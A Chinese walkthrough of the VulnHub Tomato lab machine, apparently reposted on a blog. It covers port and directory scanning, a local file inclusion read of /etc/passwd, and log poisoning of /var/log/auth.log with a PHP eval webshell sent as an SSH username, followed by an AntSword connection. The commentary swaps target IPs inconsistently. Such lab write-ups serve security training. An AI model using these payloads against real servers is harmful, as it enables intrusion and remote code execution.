VulnHub-Tomato靶机渗透教程 简单易懂 报错链接

news2024/12/26 12:05:13

Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。

环境准备

攻击机(Kali Linux)IP:192.168.252.134 

目标机 IP:192.168.252.133 

这里我两台虚拟机都是NAT模式 

渗透步骤

1.端口扫描

这里我没用kali自带的 我用的物理机上的端口扫描 结果一样 

扫出来发现几个特殊的端口 

因为2211 端口后面对应着SSH服务  所以这里试着去访问了下8888端口 出来了登录弹窗

2.目录扫描

接着 扫描下目录看看怎么个事 

dirb http://192.168.252.133

试着去访问下 antibot_image 发现下面有个info.php

进去该网页 查看源代码 发现存在文件包含漏洞 

3.文件包含漏洞

在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)

成功显示,说明存在文件包含漏洞

4.报错链接注入木马

ssh '<?php @eval($_POST[1]);?>'@192.168.252.133 -p 2211

  1. 字符串格式:

    • '<?php @eval($_POST[1]);?>' 这部分是一个PHP代码字符串,它被直接放置在SSH命令中。这段PHP代码的功能是从$_POST[1]获取数据,并尝试执行它作为PHP代码(@eval)。这通常被用于远程代码执行攻击场景中,允许攻击者通过网络发送任意PHP代码并执行。
  2. SSH 命令:

    • ssh 是一个命令行工具,用于通过网络建立安全的Shell会话。
    • '<?php @eval($_POST[1]);?>'@192.168.47.140 这里把前面的PHP代码字符串当作用户名来使用,这是不正确的,因为SSH中的用户名应当是实际的用户账户名,而不是这样的代码。
    • -p 2211 指定SSH连接使用的端口为2211,而非默认的22端口。
    • 192.168.47.140 是试图连接的远程服务器的IP地址。

综上所述,这个命令试图将一段恶意的PHP代码作为用户名的一部分传递给SSH命令,这在正常情况下是不会工作的,因为SSH并不接受或处理PHP代码。会将我们的一句话木马带到Linux 的日志文件中。

然后在网页端查看ubuntu报错信息:/var/log/auth.log

在这个文件中,你可以找到关于登录尝试、密码更改、权限变更等事件的信息。例如,当有用户通过 SSH 登录服务器时,无论成功还是失败,都会在 /var/log/auth.log 中记录相应的消息。

4.蚁剑链接

使用中国蚁剑进行连接

上传了一句话木马的路径:http://192.168.252.133/antibot_image/antibots/info.php?image=/var/log/auth.log

连接密码是刚刚POST传入的:1

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1965249.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Python学习手册(第四版)】学习笔记12.1-语法规则拓展

个人总结难免疏漏&#xff0c;请多包涵。更多内容请查看原文。本文以及学习笔记系列仅用于个人学习、研究交流。 本文是对【学习笔记10】-语句编写的通用规则 介绍过的语法概念进行复习并扩展。非常简单&#xff0c;应该是我写过的最简单的文章&#xff0c;阅读时间&#xff1a…

学习Mybatis及其简单配置

目录 JDBC的弊端 为什么要有ORM模型&#xff1f; 什么是ORM模型&#xff1f; Mybatis和hibernate 区别: Mybatis解决了jdbc的问题 为什么选择myBatis&#xff08;优势&#xff09;&#xff1f; 什么是MyBatis 主配置文件&#xff08;config文件&#xff09; Mapper文件…

TwinCAT3 C++环境安装教程

文章目录 下载windos插件:下载地址&#xff0c;安装这个插件是为了能在 TwinACT 3 工程环境创建和编辑 C模块。 点击下载的文件&#xff0c;打开其中的KitSetup.exe 在打开的窗口中选择"Build Environment"后点击OK 弹出的窗口点击ok 选择“I agree”后点击…

从零逐步实现SVM(含公式推导)上

支持向量机&#xff08;SVM&#xff09;相关概念 支持向量&#xff1a;支持或支撑平面上把两类类别划分开的超平面的向量点线性可分支持向量机&#xff1a;通过硬间隔最大化&#xff0c;学习一个线性分类器线性支持向量机&#xff1a;通过软间隔最大&#xff0c;学习一个线性分…

掌握时间的秘密:pytz 库的神奇之旅

文章目录 掌握时间的秘密&#xff1a;pytz 库的神奇之旅背景&#xff1a;为何选择 pytz&#xff1f;pytz 库是什么&#xff1f;如何安装 pytz&#xff1f;函数的使用方法场景应用常见问题与解决方案总结 掌握时间的秘密&#xff1a;pytz 库的神奇之旅 背景&#xff1a;为何选择…

【Vue3】默认插槽

【Vue3】默认插槽 背景简介开发环境开发步骤及源码 背景 随着年龄的增长&#xff0c;很多曾经烂熟于心的技术原理已被岁月摩擦得愈发模糊起来&#xff0c;技术出身的人总是很难放下一些执念&#xff0c;遂将这些知识整理成文&#xff0c;以纪念曾经努力学习奋斗的日子。本文内…

学习c语言第18天(字符串和内存函数)

1.函数介绍 1.1 strlen size_t(就是无符号整形) strlen(const char * str); 字符串已经\0作为结束标志&#xff0c;strlen函数返回的是在字符串中\0前面出现的字符个数(不包 含\0) 参数指向的字符串必须要以\0结束。 注意函数的返回值为size_t&#xff0c;…

Java并发—Java内存模型以及线程安全

目录 一、Java内存模型 JMM的核心概念 二、什么是线程安全&#xff1f; 1、原子性 2、有序性 3、可见性 三、如何确保线程安全&#xff1f; 1、sychronized关键字 2、Lock接口和其实现 3、volatile关键字 4、Atomic原子类 5、ThreadLocal 6、不可变对象 7、并发集…

电商数据采集封装API的详细步骤分享(API测试实例)

在当今的电商行业中&#xff0c;数据采集已成为企业获取市场洞察、优化运营策略、提升用户体验的重要手段。而封装电商数据采集的API接口&#xff0c;则是将这一复杂过程标准化、模块化的有效方式。本文将详细分享电商数据采集封装API的步骤&#xff0c;并通过一个实际的API测试…

努力努力努力的第十四天(2024.7.31)

昨天日期写错了写成2020.7.30,应该是2024.7.31&#xff08;手滑了哈哈哈&#xff09; 1.行列转换 效果演示&#xff1a; 这是未经行列转换操作的t_score表&#xff1a; 这是经过行列转换后的t_score表&#xff1a; 第一步&#xff1a;确定初步的做法 使用分组查询(group by…

20240731在WIN10下数框框的方法【CPU】

20240731在WIN10下数框框的方法【CPU】 2024/7/31 20:14 百度&#xff1a;WINDOWs 10 多核CPU 数框框 win10怎么数框框 1、首先打开win10系统&#xff0c;进入任务管理器。 2、其次点击CPU使用率窗口&#xff0c;鼠标悬停在右边的窗口按右键。 3、最后将图形更改为&#xff1a;…

【计算机网络】http协议的原理与应用,https是如何保证安全传输的

✨✨ 欢迎大家来到景天科技苑✨✨ &#x1f388;&#x1f388; 养成好习惯&#xff0c;先赞后看哦~&#x1f388;&#x1f388; &#x1f3c6; 作者简介&#xff1a;景天科技苑 &#x1f3c6;《头衔》&#xff1a;大厂架构师&#xff0c;华为云开发者社区专家博主&#xff0c;…

优化|高性能模块预测控制求解器

本文介绍的是另外一种针对模块控制MPC问题的一种高效求解方法。High-Performance Small-Scale Solvers for Linear Model Predictive Control&#xff0c;Gianluca Frison, Hans Henrik Brandenborg Srensen, Bernd Dammann, John Bagterp Jrgensen [1]。本文讲了HPIPM的前身&a…

Phalco安装过程以及踩的一些坑(mac环境)

一 背景 公司用Phalcon框架好长时间了,中途发现了一些Phalcon使用的上的问题,于是想在本地搭建一套Phalcon的环境,方便排查问题使用。 二 Mac系统下的安装 看了很多说法,最终发现还是官网给力,安装Phalcon使用下列命令即可(前提条件是PHP已安装好,工具pecl也安装好了):…

2024-07-31 Android studio gradle、sdk、ndk 等路径记录

一、gradle的下载路径&#xff1a;C:\Users\user\.gradle\wrapper\dists 二、NDK下载路径C:\Users\user\AppData\Local\Android\Sdk\ndk 三、SDK下载路径&#xff1a;C:\Users\user\AppData\Local\Android\Sdk\platforms

数据结构的基本概念与算法

数据结构的基本概念与算法 什么是数据&#xff1f; 数据是信息的载体&#xff0c;是描述客观事物属性的数、字符以及所有能输入到计算机中并被计算机程序识别和处理的符号的集合&#xff1b;总结来说 -> 数据就是计算机程序加工的原料&#xff1b; 数据元素、数据项&#xf…

Python+Vue3+onlyoffice开发私有化文档管理系统实战笔记 20240731

之前进度 表字段设计如下&#xff1a; const columns [{title: 名称,key: name,dataIndex: name,},{title: 类型,key: category,dataIndex: category,},{title: 作者,key: author,dataIndex: author,},{title: 路径,key: path,dataIndex: path,},{title: 最近访问时间,key: l…

【Spark计算引擎----上篇:(全网最详细)带你从零基础通往精通之路】

前言&#xff1a; &#x1f49e;&#x1f49e;大家好&#xff0c;我是书生♡&#xff0c;本阶段和大家一起分享和探索大数据技术–spark计算引擎&#xff0c;本篇文章主要讲述了&#xff1a;spark的概念&#xff0c;spark的起源&#xff0c;Spark的计算框架&#xff0c;Spark组…

Python爬虫入门03:用Urllib假装我们是浏览器

文章目录 引言Urllib库简介Request模块详解Error模块与异常处理Parse模块与URL解析Robotparser模块 模拟浏览器请求使用Request方法添加请求头信息代码示例1. 设置请求URL和请求头2. 定义请求参数并转换为适当的格式3. 使用Request方法封装请求4. 发送请求并获取响应 常用使用方…

项目实战_表白墙(升级版)

你能学到什么 表白墙&#xff08;升级版&#xff09;Mybatis的一些简单应用 正文 前⾯的案例中, 我们写了表⽩墙, 但是⼀旦服务器重启, 数据就会丢失. 要想数据不丢失, 需要把数据存储在数据库中&#xff0c;接下来咱们借助MyBatis来实现数据库的操作。 数据准备 如果我们…